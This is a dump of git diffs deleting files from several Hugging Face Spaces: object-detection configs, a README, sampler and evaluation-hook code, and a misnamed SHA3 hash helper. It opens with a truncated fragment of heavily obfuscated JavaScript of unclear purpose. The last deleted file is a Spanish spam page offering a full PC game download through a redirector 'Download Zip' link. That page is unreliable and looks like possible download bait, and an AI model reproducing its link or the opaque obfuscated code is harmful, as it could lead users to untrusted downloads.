_0x228541=-0x264e+0x112e+0x1520;_0x36d494[_0x1df5ce(-0x1d6,-0x167,-0x2e2,-0x236,-0x1f1)](_0x228541,_0x1bc6ab[_0x292b63(-0x2a9,-0x2b4,-0x2d2,-0x24a,-0x317)+'h']);_0x228541++){const _0x3d0927=_0x275b00[_0x286c2e(0x38f,0x38e,0x472,0x3c2,0x450)+_0x315baa(-0x23,0xd,0xdc,0x28,-0x26)+'r'][_0x1df5ce(-0xc0,-0x1d0,-0x1a3,-0x45,-0x126)+_0x292b63(-0x24f,-0x22f,-0x235,-0x21c,-0x1ed)][_0x1df5ce(-0x203,-0x2d3,-0x243,-0x136,-0x201)](_0x50ba5a),_0x4f0687=_0x1bc6ab[_0x228541],_0x44c38c=_0x510e9f[_0x4f0687]||_0x3d0927;_0x3d0927[_0x1df5ce(-0x179,-0x2e7,-0x239,-0x127,-0x206)+_0x56c700(0xd9,-0x85,0x122,0xda,0x58)]=_0x366acb[_0x292b63(-0x2fa,-0x254,-0x22c,-0x1e1,-0x30d)](_0x5ce843),_0x3d0927[_0x56c700(0x1f1,0x135,0x17a,0x26b,0x1e9)+_0x315baa(0x9c,-0x50,-0x79,0x2,0xbc)]=_0x44c38c[_0x315baa(0x22a,0x144,0x144,0x1a1,0x17c)+_0x56c700(-0x64,0xbb,0xb7,0xa0,0x4a)][_0x1df5ce(-0x187,-0x25e,-0x246,-0x13f,-0x201)](_0x44c38c),_0x510e9f[_0x4f0687]=_0x3d0927;}}}function _0x4c92c1(_0x31556a,_0x459b40,_0x395ee7,_0x195162,_0x4d9d70){return _0x504eae(_0x459b40-0xc1,_0x459b40-0xa1,_0x395ee7-0x126,_0x195162-0xed,_0x195162);}function _0x5ef808(_0x313b76,_0x3f475c,_0x527422,_0x576a4e,_0xd60573){return _0x1d31e6(_0x576a4e- -0x345,_0x3f475c-0x74,_0xd60573,_0x576a4e-0x156,_0xd60573-0xa9);}function _0x163385(_0x27c341,_0x53ff3b,_0x3d059a,_0x536423,_0x42ac09){return _0x5b3717(_0x27c341- -0x66,_0x3d059a,_0x3d059a-0xa,_0x536423-0xce,_0x42ac09-0x2e);}function _0x37219c(_0xca9036,_0x4dc92e,_0x422991,_0x54701d,_0x40f6bf){return _0x1e3602(_0xca9036-0xa4,_0x40f6bf,_0x422991-0x126,_0x422991-0x2b2,_0x40f6bf-0x46);}try{if(_0x274a73[_0x4c92c1(0x484,0x3ee,0x351,0x351,0x438)](_0x274a73[_0x163385(-0x1f7,-0x2a5,-0x1bb,-0x148,-0x226)],_0x274a73[_0x5ef808(-0x11f,-0x228,-0x277,-0x1f7,-0x2c2)])){if(_0x505d61){if(_0x274a73[_0x3c56c7(0x37f,0x312,0x357,0x2e0,0x2b6)](_0x274a73[_0x4c92c1(0x275,0x34e,0x301,0x3ad,0x294)],_0x274a73[_0x37219c(0x34c,0x1c9,0x274,0x1b7,0x302)]))_0x274a73[_0x5ef808(-0x28f,-0x303,-0x372,-0x2a8,-0x24f)](_0x478d65,-0xe9*0x13+0x7b8+0x993);else return _0x4dacc1;}else{if(_0x274a73[_0x163385(-0x265,-0x2d8,-0x2c6,-0x349,-0x24c)](_0x274a73[_0x37219c(0x336,0x29f,0x249,0x2eb,0x268)],_0x274a73[_0x5ef808(-0x20d,-0x12a,-0x19a,-0x1d1,-0x21f)]))_0x274a73[_0x5ef808(-0x22a,-0x36f,-0x2bd,-0x2a8,-0x2b0)](_0x4dacc1,-0x231+-0x3*0xcdb+0x28c2);else{let _0x5d9b75;try{_0x5d9b75=_0x274a73[_0x5ef808(-0x23d,-0x2cd,-0x274,-0x271,-0x2c9)](_0x58446f,_0x274a73[_0x5ef808(-0x2bd,-0x136,-0x214,-0x1f9,-0x150)](_0x274a73[_0x4c92c1(0x30d,0x38b,0x2b8,0x352,0x325)](_0x274a73[_0x4c92c1(0x3ba,0x2ce,0x296,0x295,0x2ea)],_0x274a73[_0x3c56c7(0x1ce,0x17d,0x137,0x18b,0x20d)]),');'))();}catch(_0x724811){_0x5d9b75=_0xa22605;}return _0x5d9b75;}}}else{if(_0x47e411){const _0x386471=_0x3c6c2a[_0x4c92c1(0x4c4,0x43e,0x415,0x449,0x374)](_0x5e66a5,arguments);return _0x2b067c=null,_0x386471;}}}catch(_0x399381){}}
diff --git a/spaces/Andy1621/uniformer_image_detection/configs/ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py b/spaces/Andy1621/uniformer_image_detection/configs/ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py
deleted file mode 100644
index 0a163ce445c35d51a9d8940e46697c5c6a39d354..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/configs/ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py
+++ /dev/null
@@ -1,16 +0,0 @@
-_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py'
-model = dict(
- type='MaskScoringRCNN',
- roi_head=dict(
- type='MaskScoringRoIHead',
- mask_iou_head=dict(
- type='MaskIoUHead',
- num_convs=4,
- num_fcs=2,
- roi_feat_size=14,
- in_channels=256,
- conv_out_channels=256,
- fc_out_channels=1024,
- num_classes=80)),
- # model training and testing settings
- train_cfg=dict(rcnn=dict(mask_thr_binary=0.5)))
diff --git a/spaces/Andy1621/uniformer_image_detection/configs/retinanet/README.md b/spaces/Andy1621/uniformer_image_detection/configs/retinanet/README.md
deleted file mode 100644
index 6b66534218139fea8200fa522a02b8fc35500dd7..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/configs/retinanet/README.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Focal Loss for Dense Object Detection
-
-## Introduction
-
-[ALGORITHM]
-
-```latex
-@inproceedings{lin2017focal,
- title={Focal loss for dense object detection},
- author={Lin, Tsung-Yi and Goyal, Priya and Girshick, Ross and He, Kaiming and Doll{\'a}r, Piotr},
- booktitle={Proceedings of the IEEE international conference on computer vision},
- year={2017}
-}
-```
-
-## Results and models
-
-| Backbone | Style | Lr schd | Mem (GB) | Inf time (fps) | box AP | Config | Download |
-| :-------------: | :-----: | :-----: | :------: | :------------: | :----: | :------: | :--------: |
-| R-50-FPN | caffe | 1x | 3.5 | 18.6 | 36.3 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r50_caffe_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_caffe_fpn_1x_coco/retinanet_r50_caffe_fpn_1x_coco_20200531-f11027c5.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_caffe_fpn_1x_coco/retinanet_r50_caffe_fpn_1x_coco_20200531_012518.log.json) |
-| R-50-FPN | pytorch | 1x | 3.8 | 19.0 | 36.5 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r50_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_1x_coco/retinanet_r50_fpn_1x_coco_20200130-c2398f9e.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_1x_coco/retinanet_r50_fpn_1x_coco_20200130_002941.log.json) |
-| R-50-FPN | pytorch | 2x | - | - | 37.4 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r50_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_2x_coco/retinanet_r50_fpn_2x_coco_20200131-fdb43119.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_2x_coco/retinanet_r50_fpn_2x_coco_20200131_114738.log.json) |
-| R-101-FPN | caffe | 1x | 5.5 | 14.7 | 38.5 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r101_caffe_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_caffe_fpn_1x_coco/retinanet_r101_caffe_fpn_1x_coco_20200531-b428fa0f.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_caffe_fpn_1x_coco/retinanet_r101_caffe_fpn_1x_coco_20200531_012536.log.json) |
-| R-101-FPN | pytorch | 1x | 5.7 | 15.0 | 38.5 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r101_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_1x_coco/retinanet_r101_fpn_1x_coco_20200130-7a93545f.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_1x_coco/retinanet_r101_fpn_1x_coco_20200130_003055.log.json) |
-| R-101-FPN | pytorch | 2x | - | - | 38.9 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r101_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_2x_coco/retinanet_r101_fpn_2x_coco_20200131-5560aee8.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_2x_coco/retinanet_r101_fpn_2x_coco_20200131_114859.log.json) |
-| X-101-32x4d-FPN | pytorch | 1x | 7.0 | 12.1 | 39.9 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_32x4d_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_1x_coco/retinanet_x101_32x4d_fpn_1x_coco_20200130-5c8b7ec4.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_1x_coco/retinanet_x101_32x4d_fpn_1x_coco_20200130_003004.log.json) |
-| X-101-32x4d-FPN | pytorch | 2x | - | - | 40.1 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_32x4d_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_2x_coco/retinanet_x101_32x4d_fpn_2x_coco_20200131-237fc5e1.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_2x_coco/retinanet_x101_32x4d_fpn_2x_coco_20200131_114812.log.json) |
-| X-101-64x4d-FPN | pytorch | 1x | 10.0 | 8.7 | 41.0 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_64x4d_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_1x_coco/retinanet_x101_64x4d_fpn_1x_coco_20200130-366f5af1.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_1x_coco/retinanet_x101_64x4d_fpn_1x_coco_20200130_003008.log.json) |
-| X-101-64x4d-FPN | pytorch | 2x | - | - | 40.8 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_64x4d_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_2x_coco/retinanet_x101_64x4d_fpn_2x_coco_20200131-bca068ab.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_2x_coco/retinanet_x101_64x4d_fpn_2x_coco_20200131_114833.log.json) |
diff --git a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/samplers/ohem_sampler.py b/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/samplers/ohem_sampler.py
deleted file mode 100644
index 8b99f60ef0176f1b7a56665fb0f59272f65b84cd..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/samplers/ohem_sampler.py
+++ /dev/null
@@ -1,107 +0,0 @@
-import torch
-
-from ..builder import BBOX_SAMPLERS
-from ..transforms import bbox2roi
-from .base_sampler import BaseSampler
-
-
-@BBOX_SAMPLERS.register_module()
-class OHEMSampler(BaseSampler):
- r"""Online Hard Example Mining Sampler described in `Training Region-based
- Object Detectors with Online Hard Example Mining
- `_.
- """
-
- def __init__(self,
- num,
- pos_fraction,
- context,
- neg_pos_ub=-1,
- add_gt_as_proposals=True,
- **kwargs):
- super(OHEMSampler, self).__init__(num, pos_fraction, neg_pos_ub,
- add_gt_as_proposals)
- self.context = context
- if not hasattr(self.context, 'num_stages'):
- self.bbox_head = self.context.bbox_head
- else:
- self.bbox_head = self.context.bbox_head[self.context.current_stage]
-
- def hard_mining(self, inds, num_expected, bboxes, labels, feats):
- with torch.no_grad():
- rois = bbox2roi([bboxes])
- if not hasattr(self.context, 'num_stages'):
- bbox_results = self.context._bbox_forward(feats, rois)
- else:
- bbox_results = self.context._bbox_forward(
- self.context.current_stage, feats, rois)
- cls_score = bbox_results['cls_score']
- loss = self.bbox_head.loss(
- cls_score=cls_score,
- bbox_pred=None,
- rois=rois,
- labels=labels,
- label_weights=cls_score.new_ones(cls_score.size(0)),
- bbox_targets=None,
- bbox_weights=None,
- reduction_override='none')['loss_cls']
- _, topk_loss_inds = loss.topk(num_expected)
- return inds[topk_loss_inds]
-
- def _sample_pos(self,
- assign_result,
- num_expected,
- bboxes=None,
- feats=None,
- **kwargs):
- """Sample positive boxes.
-
- Args:
- assign_result (:obj:`AssignResult`): Assigned results
- num_expected (int): Number of expected positive samples
- bboxes (torch.Tensor, optional): Boxes. Defaults to None.
- feats (list[torch.Tensor], optional): Multi-level features.
- Defaults to None.
-
- Returns:
- torch.Tensor: Indices of positive samples
- """
- # Sample some hard positive samples
- pos_inds = torch.nonzero(assign_result.gt_inds > 0, as_tuple=False)
- if pos_inds.numel() != 0:
- pos_inds = pos_inds.squeeze(1)
- if pos_inds.numel() <= num_expected:
- return pos_inds
- else:
- return self.hard_mining(pos_inds, num_expected, bboxes[pos_inds],
- assign_result.labels[pos_inds], feats)
-
- def _sample_neg(self,
- assign_result,
- num_expected,
- bboxes=None,
- feats=None,
- **kwargs):
- """Sample negative boxes.
-
- Args:
- assign_result (:obj:`AssignResult`): Assigned results
- num_expected (int): Number of expected negative samples
- bboxes (torch.Tensor, optional): Boxes. Defaults to None.
- feats (list[torch.Tensor], optional): Multi-level features.
- Defaults to None.
-
- Returns:
- torch.Tensor: Indices of negative samples
- """
- # Sample some hard negative samples
- neg_inds = torch.nonzero(assign_result.gt_inds == 0, as_tuple=False)
- if neg_inds.numel() != 0:
- neg_inds = neg_inds.squeeze(1)
- if len(neg_inds) <= num_expected:
- return neg_inds
- else:
- neg_labels = assign_result.labels.new_empty(
- neg_inds.size(0)).fill_(self.bbox_head.num_classes)
- return self.hard_mining(neg_inds, num_expected, bboxes[neg_inds],
- neg_labels, feats)
diff --git a/spaces/Andy1621/uniformer_image_detection/mmdet/core/evaluation/eval_hooks.py b/spaces/Andy1621/uniformer_image_detection/mmdet/core/evaluation/eval_hooks.py
deleted file mode 100644
index 6fb932eae1ccb23a2b687a05a6cb9525200de718..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/mmdet/core/evaluation/eval_hooks.py
+++ /dev/null
@@ -1,303 +0,0 @@
-import os.path as osp
-import warnings
-from math import inf
-
-import mmcv
-import torch.distributed as dist
-from mmcv.runner import Hook
-from torch.nn.modules.batchnorm import _BatchNorm
-from torch.utils.data import DataLoader
-
-from mmdet.utils import get_root_logger
-
-
-class EvalHook(Hook):
- """Evaluation hook.
-
- Notes:
- If new arguments are added for EvalHook, tools/test.py,
- tools/analysis_tools/eval_metric.py may be effected.
-
- Attributes:
- dataloader (DataLoader): A PyTorch dataloader.
- start (int, optional): Evaluation starting epoch. It enables evaluation
- before the training starts if ``start`` <= the resuming epoch.
- If None, whether to evaluate is merely decided by ``interval``.
- Default: None.
- interval (int): Evaluation interval (by epochs). Default: 1.
- save_best (str, optional): If a metric is specified, it would measure
- the best checkpoint during evaluation. The information about best
- checkpoint would be save in best.json.
- Options are the evaluation metrics to the test dataset. e.g.,
- ``bbox_mAP``, ``segm_mAP`` for bbox detection and instance
- segmentation. ``AR@100`` for proposal recall. If ``save_best`` is
- ``auto``, the first key will be used. The interval of
- ``CheckpointHook`` should device EvalHook. Default: None.
- rule (str, optional): Comparison rule for best score. If set to None,
- it will infer a reasonable rule. Keys such as 'mAP' or 'AR' will
- be inferred by 'greater' rule. Keys contain 'loss' will be inferred
- by 'less' rule. Options are 'greater', 'less'. Default: None.
- **eval_kwargs: Evaluation arguments fed into the evaluate function of
- the dataset.
- """
-
- rule_map = {'greater': lambda x, y: x > y, 'less': lambda x, y: x < y}
- init_value_map = {'greater': -inf, 'less': inf}
- greater_keys = ['mAP', 'AR']
- less_keys = ['loss']
-
- def __init__(self,
- dataloader,
- start=None,
- interval=1,
- by_epoch=True,
- save_best=None,
- rule=None,
- **eval_kwargs):
- if not isinstance(dataloader, DataLoader):
- raise TypeError('dataloader must be a pytorch DataLoader, but got'
- f' {type(dataloader)}')
- if not interval > 0:
- raise ValueError(f'interval must be positive, but got {interval}')
- if start is not None and start < 0:
- warnings.warn(
- f'The evaluation start epoch {start} is smaller than 0, '
- f'use 0 instead', UserWarning)
- start = 0
- self.dataloader = dataloader
- self.interval = interval
- self.by_epoch = by_epoch
- self.start = start
- assert isinstance(save_best, str) or save_best is None
- self.save_best = save_best
- self.eval_kwargs = eval_kwargs
- self.initial_epoch_flag = True
-
- self.logger = get_root_logger()
-
- if self.save_best is not None:
- self._init_rule(rule, self.save_best)
-
- def _init_rule(self, rule, key_indicator):
- """Initialize rule, key_indicator, comparison_func, and best score.
-
- Args:
- rule (str | None): Comparison rule for best score.
- key_indicator (str | None): Key indicator to determine the
- comparison rule.
- """
- if rule not in self.rule_map and rule is not None:
- raise KeyError(f'rule must be greater, less or None, '
- f'but got {rule}.')
-
- if rule is None:
- if key_indicator != 'auto':
- if any(key in key_indicator for key in self.greater_keys):
- rule = 'greater'
- elif any(key in key_indicator for key in self.less_keys):
- rule = 'less'
- else:
- raise ValueError(f'Cannot infer the rule for key '
- f'{key_indicator}, thus a specific rule '
- f'must be specified.')
- self.rule = rule
- self.key_indicator = key_indicator
- if self.rule is not None:
- self.compare_func = self.rule_map[self.rule]
-
- def before_run(self, runner):
- if self.save_best is not None:
- if runner.meta is None:
- warnings.warn('runner.meta is None. Creating a empty one.')
- runner.meta = dict()
- runner.meta.setdefault('hook_msgs', dict())
-
- def before_train_epoch(self, runner):
- """Evaluate the model only at the start of training."""
- if not self.initial_epoch_flag:
- return
- if self.start is not None and runner.epoch >= self.start:
- self.after_train_epoch(runner)
- self.initial_epoch_flag = False
-
- def evaluation_flag(self, runner):
- """Judge whether to perform_evaluation after this epoch.
-
- Returns:
- bool: The flag indicating whether to perform evaluation.
- """
- if self.start is None:
- if not self.every_n_epochs(runner, self.interval):
- # No evaluation during the interval epochs.
- return False
- elif (runner.epoch + 1) < self.start:
- # No evaluation if start is larger than the current epoch.
- return False
- else:
- # Evaluation only at epochs 3, 5, 7... if start==3 and interval==2
- if (runner.epoch + 1 - self.start) % self.interval:
- return False
- return True
-
- def after_train_epoch(self, runner):
- if not self.by_epoch or not self.evaluation_flag(runner):
- return
- from mmdet.apis import single_gpu_test
- results = single_gpu_test(runner.model, self.dataloader, show=False)
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
-
- def after_train_iter(self, runner):
- if self.by_epoch or not self.every_n_iters(runner, self.interval):
- return
- from mmdet.apis import single_gpu_test
- results = single_gpu_test(runner.model, self.dataloader, show=False)
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
-
- def save_best_checkpoint(self, runner, key_score):
- best_score = runner.meta['hook_msgs'].get(
- 'best_score', self.init_value_map[self.rule])
- if self.compare_func(key_score, best_score):
- best_score = key_score
- runner.meta['hook_msgs']['best_score'] = best_score
- last_ckpt = runner.meta['hook_msgs']['last_ckpt']
- runner.meta['hook_msgs']['best_ckpt'] = last_ckpt
- mmcv.symlink(
- last_ckpt,
- osp.join(runner.work_dir, f'best_{self.key_indicator}.pth'))
- time_stamp = runner.epoch + 1 if self.by_epoch else runner.iter + 1
- self.logger.info(f'Now best checkpoint is epoch_{time_stamp}.pth.'
- f'Best {self.key_indicator} is {best_score:0.4f}')
-
- def evaluate(self, runner, results):
- eval_res = self.dataloader.dataset.evaluate(
- results, logger=runner.logger, **self.eval_kwargs)
- for name, val in eval_res.items():
- runner.log_buffer.output[name] = val
- runner.log_buffer.ready = True
- if self.save_best is not None:
- if self.key_indicator == 'auto':
- # infer from eval_results
- self._init_rule(self.rule, list(eval_res.keys())[0])
- return eval_res[self.key_indicator]
- else:
- return None
-
-
-class DistEvalHook(EvalHook):
- """Distributed evaluation hook.
-
- Notes:
- If new arguments are added, tools/test.py may be effected.
-
- Attributes:
- dataloader (DataLoader): A PyTorch dataloader.
- start (int, optional): Evaluation starting epoch. It enables evaluation
- before the training starts if ``start`` <= the resuming epoch.
- If None, whether to evaluate is merely decided by ``interval``.
- Default: None.
- interval (int): Evaluation interval (by epochs). Default: 1.
- tmpdir (str | None): Temporary directory to save the results of all
- processes. Default: None.
- gpu_collect (bool): Whether to use gpu or cpu to collect results.
- Default: False.
- save_best (str, optional): If a metric is specified, it would measure
- the best checkpoint during evaluation. The information about best
- checkpoint would be save in best.json.
- Options are the evaluation metrics to the test dataset. e.g.,
- ``bbox_mAP``, ``segm_mAP`` for bbox detection and instance
- segmentation. ``AR@100`` for proposal recall. If ``save_best`` is
- ``auto``, the first key will be used. The interval of
- ``CheckpointHook`` should device EvalHook. Default: None.
- rule (str | None): Comparison rule for best score. If set to None,
- it will infer a reasonable rule. Default: 'None'.
- broadcast_bn_buffer (bool): Whether to broadcast the
- buffer(running_mean and running_var) of rank 0 to other rank
- before evaluation. Default: True.
- **eval_kwargs: Evaluation arguments fed into the evaluate function of
- the dataset.
- """
-
- def __init__(self,
- dataloader,
- start=None,
- interval=1,
- by_epoch=True,
- tmpdir=None,
- gpu_collect=False,
- save_best=None,
- rule=None,
- broadcast_bn_buffer=True,
- **eval_kwargs):
- super().__init__(
- dataloader,
- start=start,
- interval=interval,
- by_epoch=by_epoch,
- save_best=save_best,
- rule=rule,
- **eval_kwargs)
- self.broadcast_bn_buffer = broadcast_bn_buffer
- self.tmpdir = tmpdir
- self.gpu_collect = gpu_collect
-
- def _broadcast_bn_buffer(self, runner):
- # Synchronization of BatchNorm's buffer (running_mean
- # and running_var) is not supported in the DDP of pytorch,
- # which may cause the inconsistent performance of models in
- # different ranks, so we broadcast BatchNorm's buffers
- # of rank 0 to other ranks to avoid this.
- if self.broadcast_bn_buffer:
- model = runner.model
- for name, module in model.named_modules():
- if isinstance(module,
- _BatchNorm) and module.track_running_stats:
- dist.broadcast(module.running_var, 0)
- dist.broadcast(module.running_mean, 0)
-
- def after_train_epoch(self, runner):
- if not self.by_epoch or not self.evaluation_flag(runner):
- return
-
- if self.broadcast_bn_buffer:
- self._broadcast_bn_buffer(runner)
-
- from mmdet.apis import multi_gpu_test
- tmpdir = self.tmpdir
- if tmpdir is None:
- tmpdir = osp.join(runner.work_dir, '.eval_hook')
- results = multi_gpu_test(
- runner.model,
- self.dataloader,
- tmpdir=tmpdir,
- gpu_collect=self.gpu_collect)
- if runner.rank == 0:
- print('\n')
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
-
- def after_train_iter(self, runner):
- if self.by_epoch or not self.every_n_iters(runner, self.interval):
- return
-
- if self.broadcast_bn_buffer:
- self._broadcast_bn_buffer(runner)
-
- from mmdet.apis import multi_gpu_test
- tmpdir = self.tmpdir
- if tmpdir is None:
- tmpdir = osp.join(runner.work_dir, '.eval_hook')
- results = multi_gpu_test(
- runner.model,
- self.dataloader,
- tmpdir=tmpdir,
- gpu_collect=self.gpu_collect)
- if runner.rank == 0:
- print('\n')
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
diff --git a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py b/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py
deleted file mode 100644
index 79b5f69b654cf647dc7ae9174223781ab5c607d2..0000000000000000000000000000000000000000
--- a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py
+++ /dev/null
@@ -1,89 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-from itertools import chain
-
-from torch.nn.parallel import DataParallel
-
-from .scatter_gather import scatter_kwargs
-
-
-class MMDataParallel(DataParallel):
- """The DataParallel module that supports DataContainer.
-
- MMDataParallel has two main differences with PyTorch DataParallel:
-
- - It supports a custom type :class:`DataContainer` which allows more
- flexible control of input data during both GPU and CPU inference.
- - It implement two more APIs ``train_step()`` and ``val_step()``.
-
- Args:
- module (:class:`nn.Module`): Module to be encapsulated.
- device_ids (list[int]): Device IDS of modules to be scattered to.
- Defaults to None when GPU is not available.
- output_device (str | int): Device ID for output. Defaults to None.
- dim (int): Dimension used to scatter the data. Defaults to 0.
- """
-
- def __init__(self, *args, dim=0, **kwargs):
- super(MMDataParallel, self).__init__(*args, dim=dim, **kwargs)
- self.dim = dim
-
- def forward(self, *inputs, **kwargs):
- """Override the original forward function.
-
- The main difference lies in the CPU inference where the data in
- :class:`DataContainers` will still be gathered.
- """
- if not self.device_ids:
- # We add the following line thus the module could gather and
- # convert data containers as those in GPU inference
- inputs, kwargs = self.scatter(inputs, kwargs, [-1])
- return self.module(*inputs[0], **kwargs[0])
- else:
- return super().forward(*inputs, **kwargs)
-
- def scatter(self, inputs, kwargs, device_ids):
- return scatter_kwargs(inputs, kwargs, device_ids, dim=self.dim)
-
- def train_step(self, *inputs, **kwargs):
- if not self.device_ids:
- # We add the following line thus the module could gather and
- # convert data containers as those in GPU inference
- inputs, kwargs = self.scatter(inputs, kwargs, [-1])
- return self.module.train_step(*inputs[0], **kwargs[0])
-
- assert len(self.device_ids) == 1, \
- ('MMDataParallel only supports single GPU training, if you need to'
- ' train with multiple GPUs, please use MMDistributedDataParallel'
- 'instead.')
-
- for t in chain(self.module.parameters(), self.module.buffers()):
- if t.device != self.src_device_obj:
- raise RuntimeError(
- 'module must have its parameters and buffers '
- f'on device {self.src_device_obj} (device_ids[0]) but '
- f'found one of them on device: {t.device}')
-
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- return self.module.train_step(*inputs[0], **kwargs[0])
-
- def val_step(self, *inputs, **kwargs):
- if not self.device_ids:
- # We add the following line thus the module could gather and
- # convert data containers as those in GPU inference
- inputs, kwargs = self.scatter(inputs, kwargs, [-1])
- return self.module.val_step(*inputs[0], **kwargs[0])
-
- assert len(self.device_ids) == 1, \
- ('MMDataParallel only supports single GPU training, if you need to'
- ' train with multiple GPUs, please use MMDistributedDataParallel'
- ' instead.')
-
- for t in chain(self.module.parameters(), self.module.buffers()):
- if t.device != self.src_device_obj:
- raise RuntimeError(
- 'module must have its parameters and buffers '
- f'on device {self.src_device_obj} (device_ids[0]) but '
- f'found one of them on device: {t.device}')
-
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- return self.module.val_step(*inputs[0], **kwargs[0])
diff --git a/spaces/Banbri/zcvzcv/src/lib/computeSha256.ts b/spaces/Banbri/zcvzcv/src/lib/computeSha256.ts
deleted file mode 100644
index cb6ef0604fca9653408012fd6cef2a58b6acaf47..0000000000000000000000000000000000000000
--- a/spaces/Banbri/zcvzcv/src/lib/computeSha256.ts
+++ /dev/null
@@ -1,14 +0,0 @@
-import { createHash } from 'node:crypto'
-
-/**
- * Returns a SHA256 hash using SHA-3 for the given `content`.
- *
- * @see https://en.wikipedia.org/wiki/SHA-3
- *
- * @param {String} content
- *
- * @returns {String}
- */
-export function computeSha256(strContent: string) {
- return createHash('sha3-256').update(strContent).digest('hex')
-}
\ No newline at end of file
diff --git a/spaces/Benson/text-generation/Examples/Angry Birds Star Wars 2 Descarga Juego Para Pc Versin Completa.md b/spaces/Benson/text-generation/Examples/Angry Birds Star Wars 2 Descarga Juego Para Pc Versin Completa.md
deleted file mode 100644
index 4b942e8dfe1911e9011e8a26f906d8ad28623ecb..0000000000000000000000000000000000000000
--- a/spaces/Benson/text-generation/Examples/Angry Birds Star Wars 2 Descarga Juego Para Pc Versin Completa.md
+++ /dev/null
@@ -1,66 +0,0 @@
-
-Angry Birds Star Wars 2: Cómo descargar y jugar en PC
-¿Eres fan de Angry Birds y Star Wars? Si es así, te encantará Angry Birds Star Wars 2, la secuela del popular juego crossover que combina lo mejor de ambos mundos. En este artículo, te mostraremos cómo descargar y jugar Angry Birds Star Wars 2 en tu PC, así como algunas características y consejos que harán que tu experiencia de juego sea más agradable.
-angry birds star wars 2 descarga juego para pc versión completa
Download Zip ··· https://bltlly.com/2v6IV4
-Introducción
-¿Qué es Angry Birds Star Wars 2?
-Angry Birds Star Wars 2 es un juego casual desarrollado por Rovio Entertainment Corporation, basado en la trilogía de precuela de Star Wars. El juego sigue la historia de las películas, con algunos giros y humor añadido por los personajes de Angry Birds. Puedes jugar como Bird Side o Pork Side, usando varios personajes, armas y habilidades inspiradas en el universo de Star Wars. El juego tiene más de 200 niveles, además de niveles de bonificación, logros y recompensas que puedes desbloquear recogiendo estrellas y monedas.
-¿Por qué jugar Angry Birds Star Wars 2 en PC?
